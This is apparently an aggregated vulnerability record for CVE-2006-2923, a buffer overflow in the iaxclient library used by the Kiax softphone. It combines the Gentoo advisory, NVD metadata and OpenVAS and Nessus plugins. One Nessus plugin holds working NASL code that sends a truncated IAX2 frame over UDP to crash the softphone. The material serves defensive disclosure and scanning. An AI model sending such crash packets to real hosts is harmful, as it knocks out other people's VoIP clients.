The iax_net_read function in the iaxclient library fails to properly
handle IAX2 packets with truncated full frames or mini-frames. These
frames are detected in a length check but processed anyway, leading to
buffer overflows.
Impact
By sending a specially crafted IAX2 packet, an attacker could execute
arbitrary code with the permissions of the user running Kiax.
Workaround
There is no known workaround at this time.
Resolution
All Kiax users should upgrade to the latest version:
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
{"id": "SECURITYVULNS:DOC:13380", "bulletinFamily": "software", "title": "[Full-disclosure] [ GLSA 200606-30 ] Kiax: Arbitrary code execution", "description": "- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\nGentoo Linux Security Advisory GLSA 200606-30\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n http://security.gentoo.org/\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\n Severity: Normal\r\n Title: Kiax: Arbitrary code execution\r\n Date: June 30, 2006\r\n Bugs: #136099\r\n ID: 200606-30\r\n\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\nSynopsis\r\n========\r\n\r\nA security vulnerability in the iaxclient library could lead to the\r\nexecution of arbitrary code by a remote attacker.\r\n\r\nBackground\r\n==========\r\n\r\nKiax is a graphical softphone supporting the IAX protocol (Inter\r\nAsterisk eXchange), which allows PC users to make VoIP calls to\r\nAsterisk servers.\r\n\r\nAffected packages\r\n=================\r\n\r\n -------------------------------------------------------------------\r\n Package / Vulnerable / Unaffected\r\n -------------------------------------------------------------------\r\n 1 net-misc/kiax < 0.8.5_p1 >= 0.8.5_p1\r\n\r\nDescription\r\n===========\r\n\r\nThe iax_net_read function in the iaxclient library fails to properly\r\nhandle IAX2 packets with truncated full frames or mini-frames. These\r\nframes are detected in a length check but processed anyway, leading to\r\nbuffer overflows.\r\n\r\nImpact\r\n======\r\n\r\nBy sending a specially crafted IAX2 packet, an attacker could execute\r\narbitrary code with the permissions of the user running Kiax.\r\n\r\nWorkaround\r\n==========\r\n\r\nThere is no known workaround at this time.\r\n\r\nResolution\r\n==========\r\n\r\nAll Kiax users should upgrade to the latest version:\r\n\r\n # emerge --sync\r\n # emerge --ask --oneshot --verbose ">=net-misc/kiax-0.8.5_p1"\r\n\r\nReferences\r\n==========\r\n\r\n [ 1 ] CVE-2006-2923\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2923\r\n\r\nAvailability\r\n============\r\n\r\nThis GLSA and any updates to it are available for viewing at\r\nthe Gentoo Security Website:\r\n\r\n http://security.gentoo.org/glsa/glsa-200606-30.xml\r\n\r\nConcerns?\r\n=========\r\n\r\nSecurity is a primary focus of Gentoo Linux and ensuring the\r\nconfidentiality and security of our users machines is of utmost\r\nimportance to us. Any security concerns should be addressed to\r\nsecurity@gentoo.org or alternatively, you may file a bug at\r\nhttp://bugs.gentoo.org.\r\n\r\nLicense\r\n=======\r\n\r\nCopyright 2006 Gentoo Foundation, Inc; referenced text\r\nbelongs to its owner(s).\r\n\r\nThe contents of this document are licensed under the\r\nCreative Commons - Attribution / Share Alike license.\r\n\r\nhttp://creativecommons.org/licenses/by-sa/2.5", "published": "2006-06-30T00:00:00", "modified": "2006-06-30T00:00:00", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13380", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2006-2923"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:18", "edition": 1, "viewCount": 2, "enchantments": {"score": {"value": 6.9, "vector": "NONE", "modified": "2018-08-31T11:10:18", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-2923"]}, {"type": "osvdb", "idList": ["OSVDB:26176"]}, {"type": "nessus", "idList": ["GENTOO_GLSA-200606-30.NASL", "IAXCLIENT_TRUNCATED_FRAMES_OVERFLOW.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:57842"]}, {"type": "gentoo", "idList": ["GLSA-200606-30"]}], "modified": "2018-08-31T11:10:18", "rev": 2}, "vulnersScore": 6.9}, "affectedSoftware": []}
{"cve": [{"lastseen": "2020-10-03T11:48:15", "description": "The iax_net_read function in the iaxclient open source library, as used in multiple products including (a) LoudHush 1.3.6, (b) IDE FISK 1.35 and earlier, (c) Kiax 0.8.5 and earlier, (d) DIAX, (e) Ziaxphone, (f) IAX Phone, (g) X-lite, (h) MediaX, (i) Extreme Networks ePhone, and (j) iaxComm before 1.2.0, allows remote attackers to execute arbitrary code via crafted IAX 2 (IAX2) packets with truncated (1) full frames or (2) mini-frames, which are detected in a length check but still processed, leading to buffer overflows related to negative length values.", "edition": 3, "cvss3": {}, "published": "2006-06-09T10:02:00", "title": "CVE-2006-2923", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-2923"], "modified": "2018-10-18T16:43:00", "cpe": ["cpe:/a:loudhush:loudhush:1.3.6"], "id": "CVE-2006-2923", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2923", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:loudhush:loudhush:1.3.6:*:*:*:*:*:*:*"]}], "gentoo": [{"lastseen": "2016-09-06T19:46:42", "bulletinFamily": "unix", "cvelist": ["CVE-2006-2923"], "edition": 1, "description": "### Background\n\nKiax is a graphical softphone supporting the IAX protocol (Inter Asterisk eXchange), which allows PC users to make VoIP calls to Asterisk servers. \n\n### Description\n\nThe iax_net_read function in the iaxclient library fails to properly handle IAX2 packets with truncated full frames or mini-frames. These frames are detected in a length check but processed anyway, leading to buffer overflows. \n\n### Impact\n\nBy sending a specially crafted IAX2 packet, an attacker could execute arbitrary code with the permissions of the user running Kiax. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Kiax users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/kiax-0.8.5_p1\"", "modified": "2006-06-30T00:00:00", "published": "2006-06-30T00:00:00", "id": "GLSA-200606-30", "href": "https://security.gentoo.org/glsa/200606-30", "type": "gentoo", "title": "Kiax: Arbitrary code execution", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}], "openvas": [{"lastseen": "2017-07-24T12:50:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-2923"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200606-30.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:57842", "href": "http://plugins.openvas.org/nasl.php?oid=57842", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200606-30 (kiax)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A security vulnerability in the iaxclient library could lead to the\nexecution of arbitrary code by a remote attacker.\";\ntag_solution = \"All Kiax users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/kiax-0.8.5_p1'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200606-30\nhttp://bugs.gentoo.org/show_bug.cgi?id=136099\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200606-30.\";\n\n \n\nif(description)\n{\n script_id(57842);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2006-2923\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_name(\"Gentoo Security Advisory GLSA 200606-30 (kiax)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-misc/kiax\", unaffected: make_list(\"ge 0.8.5_p1\"), vulnerable: make_list(\"lt 0.8.5_p1\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}], "nessus": [{"lastseen": "2021-01-07T10:52:06", "description": "The remote host is affected by the vulnerability described in GLSA-200606-30\n(Kiax: Arbitrary code execution)\n\n The iax_net_read function in the iaxclient library fails to properly\n handle IAX2 packets with truncated full frames or mini-frames. These\n frames are detected in a length check but processed anyway, leading to\n buffer overflows.\n \nImpact :\n\n By sending a specially crafted IAX2 packet, an attacker could execute\n arbitrary code with the permissions of the user running Kiax.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 24, "published": "2006-07-03T00:00:00", "title": "GLSA-200606-30 : Kiax: Arbitrary code execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-2923"], "modified": "2006-07-03T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:kiax"], "id": "GENTOO_GLSA-200606-30.NASL", "href": "https://www.tenable.com/plugins/nessus/21791", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200606-30.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(21791);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-2923\");\n script_xref(name:\"GLSA\", value:\"200606-30\");\n\n script_name(english:\"GLSA-200606-30 : Kiax: Arbitrary code execution\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200606-30\n(Kiax: Arbitrary code execution)\n\n The iax_net_read function in the iaxclient library fails to properly\n handle IAX2 packets with truncated full frames or mini-frames. These\n frames are detected in a length check but processed anyway, leading to\n buffer overflows.\n \nImpact :\n\n By sending a specially crafted IAX2 packet, an attacker could execute\n arbitrary code with the permissions of the user running Kiax.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200606-30\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Kiax users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/kiax-0.8.5_p1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:kiax\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/07/03\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/06/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-misc/kiax\", unaffected:make_list(\"ge 0.8.5_p1\"), vulnerable:make_list(\"lt 0.8.5_p1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Kiax\");\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-01-01T03:16:14", "description": "The remote host appears to be using a VoIP software phone application\nthat is affected by multiple buffer overflows. With specially crafted\nUDP packets, an unauthenticated, remote attacker may be able to\nleverage these issues to crash the affected application or to execute\narbitrary code on the remote host subject to the privileges of the\nuser running it.", "edition": 23, "published": "2006-06-12T00:00:00", "title": "IAXClient Open Source Library iax_net_read Function Packet Handling Remote Overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-2923"], "modified": "2021-01-02T00:00:00", "cpe": [], "id": "IAXCLIENT_TRUNCATED_FRAMES_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/nessus/21684", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21684);\n script_version(\"1.19\");\n\n script_cve_id(\"CVE-2006-2923\");\n script_bugtraq_id(18307);\n\n script_name(english:\"IAXClient Open Source Library iax_net_read Function Packet Handling Remote Overflow\");\n script_summary(english:\"Tries to crash IAXClient application\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote softphone is prone to multiple buffer overflow attacks.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host appears to be using a VoIP software phone application\nthat is affected by multiple buffer overflows. With specially crafted\nUDP packets, an unauthenticated, remote attacker may be able to\nleverage these issues to crash the affected application or to execute\narbitrary code on the remote host subject to the privileges of the\nuser running it.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.secureauth.com/?idx=548&idxseccion=10\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/436638/30/0/threaded\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Obtain to a version of the client application built using a version of\nIAXClient from June 6 2006 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/06/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/06/06\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n\n script_category(ACT_DENIAL);\n script_family(english:\"Gain a shell remotely\");\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_dependencies(\"iax2_detection.nasl\");\n script_require_ports(\"Services/udp/iax2\", 4569);\n\n exit(0);\n}\n\n\ninclude(\"byte_func.inc\");\n\nport = get_kb_item(\"Services/udp/iax2\");\nif (!port) port = 4569;\nif (! get_udp_port_state(port)) exit(0, \"UDP port \"+port+\" is not open.\");\n\nsoc = open_sock_udp(port);\n\n\n# Verify client responds to a POKE message.\npoke = \n mkword(0x8000) + # 'F' bit + source call number\n mkword(0) + # 'R' bit + dest call number\n mkdword(0) + # timestamp\n mkbyte(0) + # OSeqno\n mkbyte(0) + # ISeqno\n mkbyte(6) + # frametype, 6 => IAX frame\n mkbyte(0x1E); # 'C' bit + subclass, 0x1e => POKE request\nsend(socket:soc, data:poke);\nres = recv(socket:soc, length:128);\nif (\n strlen(res) != 12 ||\n ord(res[10]) != 6 ||\n (ord(res[11]) != 3 && ord(res[11]) != 4)\n) exit(0);\n\n\n# Send a packet in preparation of an exploit.\ntxcnt = \n mkword(0x8000 | rand()) +\n mkword(0) +\n mkdword(rand()) +\n mkbyte(0) +\n mkbyte(0) +\n mkbyte(6) +\n mkbyte(0x17);\nsend(socket:soc, data:txcnt);\nres = recv(socket:soc, length:128);\n\n\n# Now exploit the flaw to crash the app.\ntxcnt = substr(txcnt, 0, strlen(txcnt)-2);\nsend(socket:soc, data:txcnt);\nres = recv(socket:soc, length:128);\n\n\n# Try to reconnect and send another POKE message to see if it's still up.\nsend(socket:soc, data:poke);\nres = recv(socket:soc, length:128);\nif (strlen(res) == 0) security_warning(port:port, protocol:\"udp\");\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:22", "bulletinFamily": "software", "cvelist": ["CVE-2006-2923"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nVendor URL: http://iaxclient.sourceforge.net/\nVendor Specific News/Changelog Entry: http://sourceforge.net/forum/forum.php?forum_id=577612\nVendor Specific News/Changelog Entry: http://www.loudhush.ro/changelog.txt\n[Secunia Advisory ID:20900](https://secuniaresearch.flexerasoftware.com/advisories/20900/)\n[Secunia Advisory ID:20567](https://secuniaresearch.flexerasoftware.com/advisories/20567/)\n[Secunia Advisory ID:20623](https://secuniaresearch.flexerasoftware.com/advisories/20623/)\n[Secunia Advisory ID:20466](https://secuniaresearch.flexerasoftware.com/advisories/20466/)\n[Secunia Advisory ID:20560](https://secuniaresearch.flexerasoftware.com/advisories/20560/)\nOther Advisory URL: http://www.coresecurity.com/common/showdoc.php?idx=548&idxseccion=10\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200606-30.xml\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0130.html\nFrSIRT Advisory: ADV-2006-2286\nFrSIRT Advisory: ADV-2006-2284\nFrSIRT Advisory: ADV-2006-2180\nFrSIRT Advisory: ADV-2006-2285\n[CVE-2006-2923](https://vulners.com/cve/CVE-2006-2923)\nBugtraq ID: 18307\n", "modified": "2006-06-06T11:19:22", "published": "2006-06-06T11:19:22", "href": "https://vulners.com/osvdb/OSVDB:26176", "id": "OSVDB:26176", "type": "osvdb", "title": "IAXClient Open Source Library iax_net_read Function Crafted Packet Arbitrary Code Execution", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}]}
